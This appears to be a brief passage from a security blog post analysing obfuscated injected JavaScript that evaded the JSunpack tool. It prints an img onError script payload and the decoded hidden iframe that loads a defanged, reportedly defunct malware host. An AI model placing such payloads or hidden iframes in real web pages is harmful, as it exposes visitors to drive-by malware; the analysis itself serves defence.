The obfuscation is not very difficult to figure out but it’s clever nonetheless. It’s enough to throw off JSunpack (link).
<img src="about:blank" onError=alert("hello");>
Anyway, the resulting iframe tag looks like this:
<iframe id="seaid" src="hxxp://0909.in/1289850029.php" style="width:300;height:300;border:0px;"></iframe>
The website that was called has since been taken down but I’m sure it was spewing malware earlier.